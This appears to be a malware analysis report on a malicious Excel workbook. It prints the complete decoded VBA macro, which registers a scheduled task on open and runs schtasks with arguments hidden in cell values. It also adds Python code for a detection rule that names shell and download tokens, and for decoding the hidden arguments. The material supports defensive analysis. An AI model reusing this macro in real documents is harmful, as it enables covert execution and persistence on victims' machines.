Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 01d95ccb2311edbb…

MALICIOUS

Office (OOXML) / .XLSX

Size: 212.5 KB
Created: 2000-04-13 21:48:14 UTC
Authoring application: Microsoft Excel 12.0000
First seen: 2021-07-02
MD5: 0038301925ed068226aadb215ccde46c
SHA-1: 9908793b91bdbc503d5c4e29acd922ea6052dad4
SHA-256: 01d95ccb2311edbb6725cd5b1c66fd5816ca686fdba6376dda7671232f73b684
Risk score: 108

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1547.001 Registry Run Keys / Startup Folder; T1053.005 Scheduled Task

The sample carries a VBA project whose ThisWorkbook module defines Workbook_Open, so the code runs as soon as the workbook is opened with macros enabled. Workbook_Open forces a division-by-zero error (1 / 0) and reaches its real entry point through the On Error handler: it shows a 'Thank You!' message box (title 'Good') and, once that box is dismissed, calls xPatternAutomatic. That function uses CreateObject("Schedule.Service") to reach the Task Scheduler COM API (T1053.005) and registers a task named xDialogWorkbookUnhide in the root folder ("\"), not hidden, running under the opening user's interactive token (LogonType 3), with a time trigger 79 seconds after opening, a 10-minute end boundary, an execution limit of PT5M and an Exec action whose path is "schtasks". The arguments for schtasks are not stored as a literal: they are assembled at runtime from the numeric values in cells BA50:ED111 of the sheet "GlocalSign Protected" (every value > 0 is converted with Chr), with the time five minutes after opening appended as hh:mm, which is consistent with the task using schtasks to stage a further command. The reference to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy' (T1547.001) does not appear in the decoded VBA source shown under Extracted artifacts; if it exists in the sample it sits in the cell data or the binary project rather than in the macro text. Likewise no URL or download API appears in the decoded source, so a second-stage download is inferred from the staging behaviour rather than observed statically. Useful host indicators are the scheduled task name xDialogWorkbookUnhide (description 'Start admin process at a certain time', author 'Author Name') and a schtasks invocation launched by the Task Scheduler service shortly after Excel opened the file.

Heuristics 4

  • VBA project inside OOXML (severity: medium; 3 related findings; rule OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • CreateObject call (severity: high; rule OLE_VBA_CREATEOBJ)
    Matched line in script:
        Set xLine = CreateObject("Schedule.Service")
  • VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
    Matched in this sample: Workbook_Open (auto-exec entry point) with CreateObject (execution token); both are also visible in the decoded source under Extracted artifacts.
  • Workbook_Open macro (severity: low; rule OLE_VBA_WBOPEN)
    Matched line in script:
        Sub Workbook_Open()
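As an added example (not the scanner's own implementation), the following Python applies the pairing logic the OLE_VBA_PCODE_AUTOEXEC_EXEC rule describes to decoded VBA source, module by module, using the token lists named in the rule text. The SAMPLE_VBA inside the block is a constructed condensation of the extracted macro (ThisWorkbook) plus three constructed modules that carry only one token kind or none, so the single-token cases are shown not to fire.

```python
import re

# Added example, not the scanner's code: the pairing rule that OLE_VBA_PCODE_AUTOEXEC_EXEC
# describes, applied per module to decoded VBA source (or to the strings dumped from a
# p-code/cache stream). A module is flagged only when an auto-exec entry point AND an
# execution token both occur in it.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(text, tokens):
    """Tokens present as whole identifiers, case-insensitive (VBA itself is case-insensitive).
    Identifier boundaries keep 'Shell' from matching inside 'ShellExecute' or 'xShellName'."""
    return [t for t in tokens
            if re.search(r"(?<![A-Za-z0-9_])%s(?![A-Za-z0-9_])" % re.escape(t), text, re.I)]


def split_modules(vba_source):
    """Split olevba-style concatenated output into modules on 'Attribute VB_Name' lines."""
    modules, name, body = {}, None, []
    for line in vba_source.splitlines():
        m = re.match(r'\s*Attribute VB_Name = "([^"]+)"', line)
        if m:
            if name is not None:
                modules[name] = "\n".join(body)
            name, body = m.group(1), []
        else:
            body.append(line)
    if name is not None:
        modules[name] = "\n".join(body)
    return modules or {"<stream>": vba_source}  # no module headers: treat input as one stream


def autoexec_exec_pairing(vba_source):
    """{module: (auto-exec tokens, exec tokens)} for modules where both lists are non-empty."""
    hits = {}
    for name, body in split_modules(vba_source).items():
        auto, execs = find_tokens(body, AUTOEXEC_TOKENS), find_tokens(body, EXEC_TOKENS)
        if auto and execs:
            hits[name] = (auto, execs)
    return hits


# Constructed input mirroring the sample's structure: ThisWorkbook pairs Workbook_Open with
# CreateObject; the other (constructed) modules carry one token kind only, or none.
SAMPLE_VBA = '''Attribute VB_Name = "ThisWorkbook"
Sub Workbook_Open()
    On Error GoTo xDialogFontProperties
    xCellTypeAllFormatConditions = 1 / 0
xDialogFontProperties:
    If Err.Number <> 0 Then xWorkbookTab = xPatternAutomatic()
End Sub
Function xPatternAutomatic()
    Set xLine = CreateObject("Schedule.Service")
End Function
Attribute VB_Name = "Sheet1"
Private Sub Worksheet_Change(ByVal Target As Range)
    MsgBox "neither token kind"
End Sub
Attribute VB_Name = "Module1"
Sub Auto_Open()
    MsgBox "entry point only"
End Sub
Attribute VB_Name = "Module2"
Function Helper()
    Set fso = CreateObject("Scripting.FileSystemObject")
End Function
'''


def scan_sample():
    """Run the pairing rule over the constructed sample; only ThisWorkbook should be flagged."""
    return autoexec_exec_pairing(SAMPLE_VBA)


if __name__ == "__main__":
    for module, (auto, execs) in scan_sample().items():
        print("%s: auto-exec %s paired with %s" % (module, auto, execs))
```

On real p-code-only documents the same function can be fed the string table dumped from the VBA cache stream instead of source; the identifier-boundary check matters more there, because a dumped stream carries long runs of concatenated names.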

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3424 bytes
SHA-256: 7426cef2a4a70a70e64ee7efe2e2ec9c568cea2215b9945d4aed15487b3efdec
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
    On Error GoTo xDialogFontProperties
    xCellTypeAllFormatConditions = 1 / 0
xDialogFontProperties:
        If Err.Number <> 0 Then
            xDataTable = "Thank You!"
            MsgBox xDataTable, , "Good", Err.HelpFile, Err.HelpContext
            xWorkbookTab = xPatternAutomatic()
        End If
End Sub

Function xPatternAutomatic()
    Const xOutside = 1
    Const xSubscriber = 0
    Set xLine = CreateObject("Schedule.Service")
    Call xLine.Connect
    Set xSortLabels = xLine.GetFolder(Chr(92))
    Set xAnyGallery = xLine.NewTask(0)
    Set xAbove = xAnyGallery.RegistrationInfo
    xAbove.Description = "Start admin process at a certain time"
    xAbove.Author = "Author Name"
    Set xDialogSaveWorkbook = xAnyGallery.Principal
    xDialogSaveWorkbook.LogonType = 3
    Set xToolbar = xAnyGallery.Settings
    xToolbar.Enabled = True
    xToolbar.StartWhenAvailable = True
    xToolbar.Hidden = False
    Set xDialogListboxProperties = xAnyGallery.Triggers
    Set xErrDiv0 = xDialogListboxProperties.Create(xOutside)
    xPrintErrorsDisplayed = DateAdd("s", 79, Now)
    xDialogShowDetail = xStretch(xPrintErrorsDisplayed)
    xFillFormats = DateAdd("n", 10, Now)
    xSyllabary = xStretch(xFillFormats)
    xQueryTable = DateAdd("s", 300, Now)
    xErrDiv0.StartBoundary = xDialogShowDetail
    xErrDiv0.EndBoundary = xSyllabary
    xErrDiv0.ExecutionTimeLimit = "PT5M"
    xErrDiv0.ID = "TimeTriggerId"
    xErrDiv0.Enabled = True
    Set xDAORecordset = xAnyGallery.Actions.Create(ActionTypeExec)
    xDAORecordset.Path = "schtasks"
    For Each Cell In ActiveWorkbook.Sheets("GlocalSign Protected").Range("BA50:ED111")
        If Cell.Value > 0 Then
            xClipboardFormatPrintPICT = xClipboardFormatPrintPICT & Chr(Cell.Value)
        End If
    Next Cell
    xDialogRowHeight = xClipboardFormatPrintPICT & Format(xQueryTable, "hh:mm")
        Debug.Print xDialogRowHeight
    xDAORecordset.Arguments = xDialogRowHeight
    Call xSortLabels.RegisterTaskDefinition("xDialogWorkbookUnhide", xAnyGallery, 6, , , 3)
End Function

Function xStretch(xDialogPromote)
    xRangeAutoFormatTable4 = "0" & Second(xDialogPromote)
    xExternal = "0" & Minute(xDialogPromote)
    xRangeValueXMLSpreadsheet = "0" & Hour(xDialogPromote)
    xNoButtonChanges = "0" & Day(xDialogPromote)
    xDialogProtectSharing = "0" & Month(xDialogPromote)
    xDialogFormatCharttype = Year(xDialogPromote)
    xErrorBarTypeFixedValue = Right(xRangeValueXMLSpreadsheet, 2) & ":" & Right(xExternal, 2) & ":" & Right(xRangeAutoFormatTable4, 2)
    xTransparent = xDialogFormatCharttype & "-" & Right(xDialogProtectSharing, 2) & "-" & Right(xNoButtonChanges, 2)
    xStretch = xTransparent & "T" & xErrorBarTypeFixedValue
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 16384 bytes
SHA-256: d71e9348c15f28e5ad3001dbba7cf0180ed2451be0ec12e70b6b7c00f6cfbe5b
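Added example, not part of the report and not the analysis tool's code: recovering the schtasks arguments that xPatternAutomatic assembles from the worksheet. It reads the worksheet part for "GlocalSign Protected" out of the xlsx container (workbook.xml and its .rels map the sheet name to the part), replays the Chr() loop over BA50:ED111 in the same row-major order as VBA's For Each over a Range, and reproduces the hh:mm suffix and the xStretch() trigger boundaries for a given opening time. The xlsx fixture built inside the block is constructed with placeholder text and a constructed opening time; the sample's real cell contents are not reproduced on this page.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

# Added example, not part of the report: recover the schtasks arguments the macro builds
# from cells BA50:ED111 of sheet "GlocalSign Protected" and reproduce the trigger times it
# registers. The xlsx fixture below is constructed with placeholder text; the sample's real
# cell contents are not reproduced here.
MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS = {"m": MAIN_NS}
SAMPLE_OPENED_AT = datetime(2021, 7, 2, 9, 0, 0)  # constructed "Now" for the worked result

def col_to_index(col):
    """Excel column letters to 1-based index: A=1, Z=26, BA=53, ED=134."""
    n = 0
    for ch in col.upper():
        n = n * 26 + ord(ch) - 64
    return n

def index_to_col(n):
    s = ""
    while n:
        n, rem = divmod(n - 1, 26)
        s = chr(65 + rem) + s
    return s

def parse_ref(ref):
    """'BA50' -> (53, 50)."""
    m = re.fullmatch(r"([A-Z]+)(\d+)", ref)
    return col_to_index(m.group(1)), int(m.group(2))

def sheet_xml_from_xlsx(xlsx_bytes, sheet_name):
    """Locate the worksheet part for a sheet name via xl/workbook.xml and its .rels."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        rid = next(s.get("{%s}id" % R_NS) for s in wb.iterfind(".//m:sheets/m:sheet", NS)
                   if s.get("name") == sheet_name)
        rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
        target = next(r.get("Target") for r in rels if r.get("Id") == rid).lstrip("/")
        return z.read(target if target.startswith("xl/") else "xl/" + target)

def sheet_values(sheet_xml):
    """(col, row) -> value for numeric cells; string, boolean and error cells are skipped."""
    values = {}
    for c in ET.fromstring(sheet_xml).iterfind(".//m:sheetData/m:row/m:c", NS):
        v = c.find("m:v", NS)
        if v is not None and c.get("t") not in ("s", "str", "inlineStr", "b", "e"):
            values[parse_ref(c.get("r"))] = float(v.text)
    return values

def decode_range(values, top_left="BA50", bottom_right="ED111"):
    """Replay the macro loop: walk the range row by row and append Chr(value) for each value > 0."""
    c1, r1 = parse_ref(top_left)
    c2, r2 = parse_ref(bottom_right)
    return "".join(chr(int(values[(col, row)]))
                   for row in range(r1, r2 + 1) for col in range(c1, c2 + 1)
                   if values.get((col, row), 0) > 0)

def trigger_window(opened_at):
    """xStretch() output for StartBoundary = Now + 79 s and EndBoundary = Now + 10 min."""
    fmt = "%Y-%m-%dT%H:%M:%S"  # zero-padded yyyy-mm-ddThh:mm:ss, as the macro concatenates it
    return (opened_at + timedelta(seconds=79)).strftime(fmt), (opened_at + timedelta(minutes=10)).strftime(fmt)

def task_arguments(decoded, opened_at):
    """Arguments = decoded cells & Format(Now + 300 s, "hh:mm")."""
    return decoded + (opened_at + timedelta(seconds=300)).strftime("%H:%M")

def build_sample_xlsx(text, sheet_name="GlocalSign Protected", start="BA50"):
    """Constructed fixture: minimal xlsx whose cells from `start` hold the Chr codes of `text`,
    plus one zero cell and one shared-string cell in the next row, which the loop ignores."""
    c1, r1 = parse_ref(start)
    cells = "".join('<c r="%s%d"><v>%d</v></c>' % (index_to_col(c1 + i), r1, ord(ch))
                    for i, ch in enumerate(text))
    sheet = ('<worksheet xmlns="%s"><sheetData><row r="%d">%s</row><row r="%d">'
             '<c r="BA%d"><v>0</v></c><c r="BB%d" t="s"><v>0</v></c></row></sheetData></worksheet>'
             % (MAIN_NS, r1, cells, r1 + 1, r1 + 1, r1 + 1))
    workbook = ('<workbook xmlns="%s" xmlns:r="%s"><sheets><sheet name="%s" sheetId="1" r:id="rId1"/>'
                '</sheets></workbook>' % (MAIN_NS, R_NS, sheet_name))
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
            'relationships/worksheet" Target="worksheets/sheet1.xml"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/_rels/workbook.xml.rels", rels)
        z.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()

def recover(xlsx_bytes, opened_at=SAMPLE_OPENED_AT):
    """Decoded schtasks arguments and trigger window for a workbook opened at opened_at."""
    decoded = decode_range(sheet_values(sheet_xml_from_xlsx(xlsx_bytes, "GlocalSign Protected")))
    return task_arguments(decoded, opened_at), trigger_window(opened_at)
```

To run this against the real sample, pass the file bytes to recover() instead of the fixture; because the command only exists once the cells are decoded at runtime, a static summary cannot state the second-stage command without this step, and a sandbox run will show it only as the schtasks command line spawned by the Task Scheduler about 79 seconds after the message box is dismissed.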